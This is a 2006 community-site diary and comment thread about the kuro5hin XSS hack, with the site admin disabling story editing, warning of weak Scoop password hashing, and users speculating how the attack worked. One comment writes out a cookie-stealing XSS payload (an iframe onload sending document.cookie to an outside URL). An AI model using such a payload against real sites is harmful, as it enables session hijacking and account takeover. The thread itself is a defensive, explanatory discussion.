Print Story Hi peeps
I've had to turn off the ability to edit your own story for a while.

Update [2006-6-15 8:47:32 by hulver]: Important information about passwords inside.



I should have posted this to the scoop-dev mailing list first really, but I've been sat on this for a while.

After k5 got hacked I don't want to take any chance. Hopefully I'll get this fixed tonight and turn the settings back on.


Passwords

The scoop method of storing passwords is horribly weak. It's entirely possible to brute force every password < 6 characters within a couple of days. You could search the entire 8 character (yes, it only stores 8 characters of your password) password space in a couple of months. Less on a faster computer. A dictionary search could be done in a couple of hours.
So, if you use the same password for k5 anywhere else, I suggest you change it. I don't know if whoever hacked k5 took a dump of the user database, but seeing as they had access to it to at least run "UPDATE USERS SET perm_group = 'Superuser'" it's a possibility.

< Both busy, and not. | BBC White season: 'Rivers of Blood' >
Hi peeps | 28 comments (28 topical, 0 hidden) | Trackback
*Open* source, eh? by yicky yacky (4.00 / 1) #1 Thu Jun 15, 2006 at 12:59:07 AM EST
;)
----
Vacuity abhors a vacuum.
don't worry by martingale (4.00 / 3) #2 Thu Jun 15, 2006 at 01:02:38 AM EST
You're safe as long as the exploit doesn't get published on a buglist by a windows security company.
--
$E(X_t|F_s) = X_s,\quad t > s$
Was it a story editing bug then? by priestess (4.00 / 1) #3 Thu Jun 15, 2006 at 01:11:49 AM EST
I thought someone said it was just a Cross Site Scripting thing, which presumably means they can put whatever script it was into the story without having to use the Story Edit function?

Maybe the Story Edit function doesn't do all the filtering and checking that the original post story does? A hole in the filter-out-the-XSS functions I guess.

Hey ho, I never seem to post stories anyway really.

Pre........
---------
Chat to the virtual me...

K5 was an xss bug by hulver (4.00 / 1) #6 Thu Jun 15, 2006 at 01:29:46 AM EST
There were two bugs. One in the search page (now fixed). And one in the "Edit your own story" code.

I've fixed the search xss bug on HuSi, but the "Edit your own story" bug is still there. k5 doesn't let users edit their own stories so they're not vulnrable.

Any scoop site that does, is.
--
Cheese is not a hat. - clock

[ Parent ]
K5 got hacked? by IEFBR14 (4.00 / 12) #4 Thu Jun 15, 2006 at 01:19:12 AM EST
How could they tell?

Search started working by Rogerborg (2.00 / 0) #21 Thu Jun 15, 2006 at 11:32:56 AM EST
Not to worry, ruston put it back the way it should be again.

-
Metus amatores matrum compescit, non clementia.
[ Parent ]
I can still see the edit button by gpig (4.00 / 1) #5 Thu Jun 15, 2006 at 01:25:15 AM EST
and get to the edit page.
---
(,   ,') -- eep
D'oh! by hulver (4.00 / 1) #7 Thu Jun 15, 2006 at 01:30:33 AM EST
I turned the wrong permission off.

Thanks.
--
Cheese is not a hat. - clock

[ Parent ]
Ever since you by joh3n (4.00 / 2) #8 Thu Jun 15, 2006 at 02:42:31 AM EST
outsourced the customer service call center to India, this website has gone downhill. Downhill, I say!  I demand my money back!

----
I am a crime against humanity
-theantix

k5 got hacked? by blixco (4.00 / 1) #9 Thu Jun 15, 2006 at 03:00:32 AM EST
I wanna read all about it!  Links, anyone?
---------------------------------
Taken out of context I must seem so strange - Ani DiFranco
Rusty's diary by hulver (4.00 / 1) #10 Thu Jun 15, 2006 at 03:12:18 AM EST
http://www.kuro5hin.org/story/2006/6/14/18650/8795

Not much on the details though. I'd like to know exactly how they did it. I'm betting they stole an admin users session cookie.
--
Cheese is not a hat. - clock

[ Parent ]
If I were to have done it by gazbo (4.00 / 1) #11 Thu Jun 15, 2006 at 03:28:21 AM EST
I'd create a link to a search page, and one of search URL parameters (say, the search type) would be a URL encoded version of a bit of HTML and event handlers - something like:


<iframe onload="window.location = 'http://my.site.com/pwned.html?cookie=' + document.cookie;" />

So that is echoed back to the user inside a table cell, and as it loads (iframe is used solely for the onload event handler) it broadcasts the cookie to whoever is interested.

I've not tried this or even thought about it too hard, but looking at the patch I can't see why this wouldn't work - specifically I'm not sure why a buffer overflow was mentioned at all.


I recommend always assuming 7th normal form where items in a text column are not allowed to rhyme.

[ Parent ]
Me too by hulver (4.00 / 1) #12 Thu Jun 15, 2006 at 03:41:24 AM EST
I'd have done something similar.

I think buffer overflow was mentioned because somebody saw "%3F%4E" etc in the url and thought "I don't understand that, it must be a buffer overflow".

If it was originally linked to last measure or something similar then it was fairly un-subtle. Good way to announce "I've found a hole, ha ha", but not a good way to permanently take over the site.

A determined attacker could have just made themselves an admin user and modified the cabal box to not display their name. They could then have had weeks to do whatever they liked. Maybe they did.

Note to self. Add "http-only" flag to cookies. Not that it helps for firefox.
--
Cheese is not a hat. - clock

[ Parent ]
Rusty's most recent diary by gazbo (4.00 / 1) #16 Thu Jun 15, 2006 at 06:55:19 AM EST
Has a link to a full explanation.

The long and short of it is that it's what we said.


I recommend always assuming 7th normal form where items in a text column are not allowed to rhyme.

[ Parent ]
Yes. by aphrael (4.00 / 1) #20 Thu Jun 15, 2006 at 09:50:18 AM EST
We were very lucky in that the hacker in question wasn't subtle. He called attention to himself rather than slowly worming his way in.
If television is a babysitter, the internet is a drunk librarian who won't shut up.
[ Parent ]
He says by Rogerborg (2.00 / 0) #22 Thu Jun 15, 2006 at 11:34:30 AM EST
First, you steal all the money.  THEN you invite a mob in to burn down the bank and hide the evidence.

-
Metus amatores matrum compescit, non clementia.
[ Parent ]
there's money to steal at k5? by aphrael (4.00 / 1) #23 Thu Jun 15, 2006 at 12:07:49 PM EST
Well, a yatch by Rogerborg (2.00 / 0) #24 Thu Jun 15, 2006 at 01:56:08 PM EST
I am not going to get started on the CMF slush fund, I am not going to get started on the CMF slush fund.

-
Metus amatores matrum compescit, non clementia.
[ Parent ]
too late. by aphrael (2.00 / 0) #25 Thu Jun 15, 2006 at 02:03:43 PM EST
besides, how many years has it been? what's your burn rate?
If television is a babysitter, the internet is a drunk librarian who won't shut up.
[ Parent ]
so you're saying by aphrael (4.00 / 1) #26 Thu Jun 15, 2006 at 02:04:07 PM EST
Passwords by jimgon (2.00 / 0) #13 Thu Jun 15, 2006 at 04:14:37 AM EST
Thanks for that.  I hadn't thunk about it.




---------------
Technician - "We can't even get decent physical health care. Mental health is like witchcraft here."
Or by komet (2.00 / 0) #14 Thu Jun 15, 2006 at 06:19:23 AM EST
one might elect to not change one's password on an unimportant site and wait and see if anyone else logs in.

It would be great if Scoop could show you the IPs you've used to log in in the last 7 days or so. Would that be hard to code?

--
<ni> komet: You are functionally illiterate as regards trashy erotica.

No by hulver (2.00 / 0) #15 Thu Jun 15, 2006 at 06:22:32 AM EST
Not at all.
--
Cheese is not a hat. - clock
[ Parent ]
There you go by hulver (4.00 / 4) #17 Thu Jun 15, 2006 at 06:58:21 AM EST
http://www.hulver.com/scoop/ip
--
Cheese is not a hat. - clock
[ Parent ]
you rule by komet (4.00 / 1) #18 Thu Jun 15, 2006 at 07:04:06 AM EST
that's great.

--
<ni> komet: You are functionally illiterate as regards trashy erotica.
[ Parent ]
i don't believe they ran that query. by aphrael (2.00 / 0) #19 Thu Jun 15, 2006 at 09:48:43 AM EST
i think they used the groups editor to add rights to low level groups.
If television is a babysitter, the internet is a drunk librarian who won't shut up.
please email me by janra (2.00 / 0) #27 Fri Jun 16, 2006 at 02:55:49 PM EST
I'd like to know where in the code you see this thing with the password being chopped down to 8 characters, because I don't see anything like that in the cvs code.

What I see is the entire password supplied by the user being passed to Crypt::UnixCrypt for encrypting, and the salt being chopped off.

Also I'd like to know what you found in terms of story editing... I may have found the same one not too long ago.
--
Discuss the art and craft of writing

It ain't scoop that is doin' the choppin... by coryking (2.00 / 0) #28 Sun Jun 18, 2006 at 08:13:38 PM EST
It is the Crypt::UnixCrypt library.


-------------
Dog food. Snack for some. Feast for others.

[ Parent ]
Hi peeps | 28 comments (28 topical, 0 hidden) | Trackback